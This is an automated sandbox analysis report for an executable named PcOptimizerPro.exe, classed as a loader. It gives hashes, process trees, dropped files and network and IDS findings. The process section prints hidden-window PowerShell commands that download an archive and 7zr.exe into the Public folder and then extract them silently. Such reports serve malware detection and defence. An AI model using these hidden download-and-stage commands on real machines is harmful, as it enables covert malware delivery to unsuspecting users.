File name:

PcOptimizerPro.exe

Full analysis: https://app.any.run/tasks/5d197c0f-b3c6-48e7-886e-5afbf647e958
Verdict: Malicious activity
Threats:

A loader is malicious software that infiltrates devices to deliver malicious payloads. This malware is capable of infecting victims’ computers, analyzing their system information, and installing other types of threats, such as trojans or stealers. Criminals usually deliver loaders through phishing emails and links by relying on social engineering to trick users into downloading and running their executables. Loaders employ advanced evasion and persistence tactics to avoid detection.

Analysis date: October 03, 2025, 17:06:49
OS: Windows 10 Professional (build: 19044, 64 bit)
Tags:
github
loader
Indicators:
MIME: application/vnd.microsoft.portable-executable
File info: PE32+ executable (console) x86-64, for MS Windows, 6 sections
MD5:

7A37DFB22CEAF682738E4DE87E8B81F1

SHA1:

C31499D713FEA0A163A0CB8364261CFCFACAB1A5

SHA256:

7728C17E5019CE6DC7DEEF83F1C9612DC7617EF595D1A93AE8424D12C7282946

SSDEEP:

768:fydhnBdDzuGPT5fda8SSwREYTQsr99fiBnwoxGz9JRJP9NWOOMOTDv3bjE:uZP/aHGsh9TfpMOOLjjE

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.
  • MALICIOUS

    • Run PowerShell with an invisible window

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 6388)
  • SUSPICIOUS

    • Starts POWERSHELL.EXE for commands execution

      • cmd.exe (PID: 4444)
      • cmd.exe (PID: 7980)
    • Hides command output

      • cmd.exe (PID: 4444)
      • cmd.exe (PID: 2176)
      • cmd.exe (PID: 7980)
      • cmd.exe (PID: 4108)
    • Likely accesses (executes) a file from the Public directory

      • cmd.exe (PID: 4444)
      • powershell.exe (PID: 4584)
      • cmd.exe (PID: 7980)
      • powershell.exe (PID: 6388)
      • 7zr.exe (PID: 2128)
      • cmd.exe (PID: 4108)
    • Starts CMD.EXE for commands execution

      • PcOptimizerPro.exe (PID: 6120)
    • Hides errors and continues executing the command without stopping

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 6388)
    • Downloads file from URI via Powershell

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 6388)
    • There is functionality for taking screenshot (YARA)

      • PcOptimizerPro.exe (PID: 6120)
    • Drops 7-zip archiver for unpacking

      • powershell.exe (PID: 6388)
    • Executable content was dropped or overwritten

      • powershell.exe (PID: 6388)
  • INFO

    • Checks supported languages

      • PcOptimizerPro.exe (PID: 6120)
      • 7zr.exe (PID: 2128)
    • Disables trace logs

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 6388)
    • Checks proxy server information

      • powershell.exe (PID: 4584)
      • powershell.exe (PID: 6388)
      • slui.exe (PID: 2192)
    • The sample compiled with english language support

      • powershell.exe (PID: 6388)
    • Reads the computer name

      • 7zr.exe (PID: 2128)
    • Reads the software policy settings

      • slui.exe (PID: 2192)
Find more information about signature artifacts and mapping to MITRE ATT&CK™ MATRIX at the full report
No Malware configuration.

TRiD

.exe | Win64 Executable (generic) (87.3)
.exe | Generic Win/DOS Executable (6.3)
.exe | DOS Executable Generic (6.3)

EXIF

EXE

MachineType: AMD AMD64
TimeStamp: 2025:10:03 17:01:21+00:00
ImageFileCharacteristics: Executable, Large address aware
PEType: PE32+
LinkerVersion: 14.44
CodeSize: 27136
InitializedDataSize: 29184
UninitializedDataSize: -
EntryPoint: 0x66f8
OSVersion: 6
ImageVersion: -
SubsystemVersion: 6
Subsystem: Windows command line
No data.
screenshot
All screenshots are available in the full report
All screenshots are available in the full report
Total processes
166
Monitored processes
10
Malicious processes
2
Suspicious processes
3

Behavior graph

Click at the process to see the details
start pcoptimizerpro.exe no specs conhost.exe no specs cmd.exe no specs cmd.exe no specs powershell.exe cmd.exe no specs powershell.exe cmd.exe no specs 7zr.exe no specs slui.exe

Process information

PID
CMD
Path
Indicators
Parent process
1216\??\C:\WINDOWS\system32\conhost.exe 0xffffffff -ForceV1C:\Windows\System32\conhost.exePcOptimizerPro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Console Window Host
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\conhost.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\shcore.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\rpcrt4.dll
2128C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y C:\Users\Public\7zr.execmd.exe
User:
admin
Company:
Igor Pavlov
Integrity Level:
MEDIUM
Description:
7-Zip Reduced Standalone Console
Version:
25.01
Modules
Images
c:\users\public\7zr.exe
c:\windows\system32\ntdll.dll
c:\windows\syswow64\ntdll.dll
c:\windows\system32\wow64.dll
c:\windows\system32\wow64win.dll
c:\windows\system32\wow64cpu.dll
c:\windows\syswow64\kernel32.dll
c:\windows\syswow64\kernelbase.dll
c:\windows\syswow64\apphelp.dll
c:\windows\syswow64\oleaut32.dll
2176C:\WINDOWS\system32\cmd.exe /c g++ --version 2>nulC:\Windows\System32\cmd.exePcOptimizerPro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
1
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
2192C:\WINDOWS\System32\slui.exe -EmbeddingC:\Windows\System32\slui.exe
svchost.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Activation Client
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\slui.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\bcrypt.dll
c:\windows\system32\user32.dll
4108C:\WINDOWS\system32\cmd.exe /c C:\Users\Public\7zr.exe x C:\Users\Public\mingw.7z -oC:\Users\Public\ -y >nul 2>&1C:\Windows\System32\cmd.exePcOptimizerPro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4444C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" >nul 2>&1C:\Windows\System32\cmd.exePcOptimizerPro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
4584powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z' -OutFile 'C:\Users\Public\mingw.7z' }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
6120"C:\Users\admin\Desktop\PcOptimizerPro.exe" C:\Users\admin\Desktop\PcOptimizerPro.exeexplorer.exe
User:
admin
Integrity Level:
MEDIUM
Modules
Images
c:\users\admin\desktop\pcoptimizerpro.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\user32.dll
c:\windows\system32\win32u.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\gdi32full.dll
c:\windows\system32\msvcp_win.dll
6388powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
cmd.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows PowerShell
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\msvcp_win.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\combase.dll
7980C:\WINDOWS\system32\cmd.exe /c powershell -WindowStyle Hidden -Command "& {$ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest -Uri 'https://www.7-zip.org/a/7zr.exe' -OutFile 'C:\Users\Public\7zr.exe' }" >nul 2>&1C:\Windows\System32\cmd.exePcOptimizerPro.exe
User:
admin
Company:
Microsoft Corporation
Integrity Level:
MEDIUM
Description:
Windows Command Processor
Exit code:
0
Version:
10.0.19041.1 (WinBuild.160101.0800)
Modules
Images
c:\windows\system32\cmd.exe
c:\windows\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\combase.dll
c:\windows\system32\ucrtbase.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
Total events
13 201
Read events
13 201
Write events
0
Delete events
0

Modification events

No data
Executable files
1
Suspicious files
627
Text files
1 479
Unknown types
0

Dropped files

PID
Process
Filename
Type
4584powershell.exeC:\Users\Public\mingw.7z
MD5:
SHA256:
4584powershell.exeC:\Users\admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractivebinary
MD5:18E7FAC09ABA466B62747A3FB2A0CF88
SHA256:C9C9A985C7A06B850427489C5E92CC828BC5A1E1F2A7A5F3000DD2F205350472
4584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_oqwd30aa.cy4.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
21287zr.exeC:\Users\Public\mingw64\include\dis-asm.htext
MD5:BDD4919E7DF8C0FD06C52E7D0878D720
SHA256:74E1F5B1D73AF44D4A9ABA045AB934CBEFB2AFDBBACF8A50796DFC6F0CBF4828
21287zr.exeC:\Users\Public\mingw64\include\ctf-api.htext
MD5:4A3BE080C153C3AEABD04F6A409D1D7B
SHA256:25637E58294ADB0DBAE22163951721690792B933ED615D4248C6E2F653DA11EE
21287zr.exeC:\Users\Public\mingw64\include\bfd.htext
MD5:AD7E04F3D569236B762EE0E9900FDBB4
SHA256:5729766FF452279046976E81E417DF9C5F4A135079D2F086693403F02F681863
6388powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_0o2vkjw1.kus.ps1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
4584powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_rgzo0304.lj2.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
6388powershell.exeC:\Users\admin\AppData\Local\Temp\__PSScriptPolicyTest_x1yxjhti.aad.psm1text
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
21287zr.exeC:\Users\Public\mingw64\include\diagnostics.htext
MD5:ABDCF5BDD20246C05EED95AE98DD2551
SHA256:A92C7D29C0DF4AD62753CE7E37EC5231C572934EB5BD5A75A5F87012011F8CF3
Download PCAP, analyze network streams, HTTP content and a lot more at the full report
HTTP(S) requests
4
TCP/UDP connections
16
DNS requests
8
Threats
9

HTTP requests

PID
Process
Method
HTTP Code
IP
URL
CN
Type
Size
Reputation
GET
302
140.82.121.4:443
https://github.com/niXman/mingw-builds-binaries/releases/download/13.2.0-rt_v11-rev0/x86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z
US
unknown
GET
200
185.199.111.133:443
https://release-assets.githubusercontent.com/github-production-release-asset/446033510/00d335dc-bf12-4597-b41d-567805d2431e?sp=r&sv=2018-11-09&sr=b&spr=https&se=2025-10-03T17%3A43%3A58Z&rscd=attachment%3B+filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&rsct=application%2Foctet-stream&skoid=96c2d410-5711-43a1-aedd-ab1947aa7ab0&sktid=398a6654-997b-47e9-b12b-9515b896b4de&skt=2025-10-03T16%3A43%3A52Z&ske=2025-10-03T17%3A43%3A58Z&sks=b&skv=2018-11-09&sig=x8AkWRgmFv0EJ3UPVlyYfDsX41PaUYV7BKm4S0NZDkM%3D&jwt=eyJ0eXAiOiJKV1QiLCJhbGciOiJIUzI1NiJ9.eyJpc3MiOiJnaXRodWIuY29tIiwiYXVkIjoicmVsZWFzZS1hc3NldHMuZ2l0aHVidXNlcmNvbnRlbnQuY29tIiwia2V5Ijoia2V5MSIsImV4cCI6MTc1OTUxMzAyMiwibmJmIjoxNzU5NTExMjIyLCJwYXRoIjoicmVsZWFzZWFzc2V0cHJvZHVjdGlvbi5ibG9iLmNvcmUud2luZG93cy5uZXQifQ.MhGVWA-7BQwiFvTQPhxspi-ig9aE2jWEjho2kcDG8ec&response-content-disposition=attachment%3B%20filename%3Dx86_64-13.2.0-release-posix-seh-msvcrt-rt_v11-rev0.7z&response-content-type=application%2Foctet-stream
NL
69.6 Mb
unknown
GET
200
49.12.202.237:443
https://www.7-zip.org/a/7zr.exe
DE
executable
587 Kb
unknown
POST
500
4.154.185.43:443
https://activation-v2.sls.microsoft.com/SLActivateProduct/SLActivateProduct.asmx?configextension=Retail
US
xml
512 b
unknown
Download PCAP, analyze network streams, HTTP content and a lot more at the full report

Connections

PID
Process
IP
Domain
ASN
CN
Reputation
4
System
192.168.100.255:137
whitelisted
3404
RUXIMICS.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
6016
MoUsoCoreWorker.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
95.101.136.194:443
www.bing.com
Akamai International B.V.
GB
whitelisted
4
System
192.168.100.255:138
whitelisted
5948
svchost.exe
40.127.240.158:443
settings-win.data.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
IE
whitelisted
4584
powershell.exe
140.82.121.4:443
github.com
GITHUB
US
whitelisted
4584
powershell.exe
185.199.111.133:443
release-assets.githubusercontent.com
FASTLY
US
whitelisted
6388
powershell.exe
49.12.202.237:443
www.7-zip.org
Hetzner Online GmbH
DE
whitelisted
1920
slui.exe
4.154.185.43:443
activation-v2.sls.microsoft.com
MICROSOFT-CORP-MSN-AS-BLOCK
US
whitelisted

DNS requests

Domain
IP
Reputation
settings-win.data.microsoft.com
  • 40.127.240.158
whitelisted
www.bing.com
  • 95.101.136.194
  • 95.101.136.201
whitelisted
google.com
  • 172.217.16.142
whitelisted
github.com
  • 140.82.121.4
whitelisted
release-assets.githubusercontent.com
  • 185.199.111.133
  • 185.199.110.133
  • 185.199.109.133
  • 185.199.108.133
whitelisted
www.7-zip.org
  • 49.12.202.237
whitelisted
activation-v2.sls.microsoft.com
  • 4.154.185.43
  • 4.154.209.85
whitelisted

Threats

PID
Process
Class
Message
Unknown Traffic
ET USER_AGENTS Microsoft Dr Watson User-Agent (MSDW)
2428
svchost.exe
Not Suspicious Traffic
INFO [ANY.RUN] Attempting to access release user assets on GitHub
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potentially Bad Traffic
ET HUNTING 7-zip Executable Requested (GET)
Not Suspicious Traffic
ET INFO Windows Powershell User-Agent Usage
Potential Corporate Privacy Violation
ET INFO PE EXE or DLL Windows file download HTTP
Misc activity
ET INFO Request for EXE via Powershell
No debug info